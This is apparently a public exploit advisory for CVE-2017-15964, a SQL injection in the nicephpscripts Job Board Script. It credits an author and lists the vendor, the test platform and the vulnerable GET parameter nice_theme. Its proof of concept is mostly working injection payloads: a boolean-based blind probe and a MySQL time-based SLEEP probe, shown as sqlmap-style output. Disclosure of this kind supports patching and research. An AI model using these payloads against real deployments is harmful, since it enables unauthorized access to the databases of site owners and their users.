34 lines
No EOL
939 B
Text
34 lines
No EOL
939 B
Text
# # # # #
|
|
# Exploit Title: Job Board Script - SQL Injection
|
|
# Dork: N/A
|
|
# Date: 30.10.2017
|
|
# Vendor Homepage: http://www.nicephpscripts.com/
|
|
# Software http://www.nicephpscripts.com/job_board_script.htm
|
|
# Demo: http://www.nicephpscripts.com/scripts/faqscript/
|
|
# Version: N/A
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: CVE-2017-15964
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Social: @ihsansencan
|
|
# # # # #
|
|
# Description:
|
|
# The vulnerability allows an attacker to inject sql commands....
|
|
#
|
|
# Proof of Concept:
|
|
#
|
|
# http://localhost/[PATH]/index.php?nice_theme=[SQL]
|
|
#
|
|
# Parameter: nice_theme (GET)
|
|
# Type: boolean-based blind
|
|
# Title: AND boolean-based blind - WHERE or HAVING clause
|
|
# Payload: nice_theme=2 AND 9686=9686
|
|
#
|
|
# Type: AND/OR time-based blind
|
|
# Title: MySQL >= 5.0.12 AND time-based blind
|
|
# Payload: nice_theme=2 AND SLEEP(5)
|
|
#
|
|
# Etc..
|
|
# # # # # |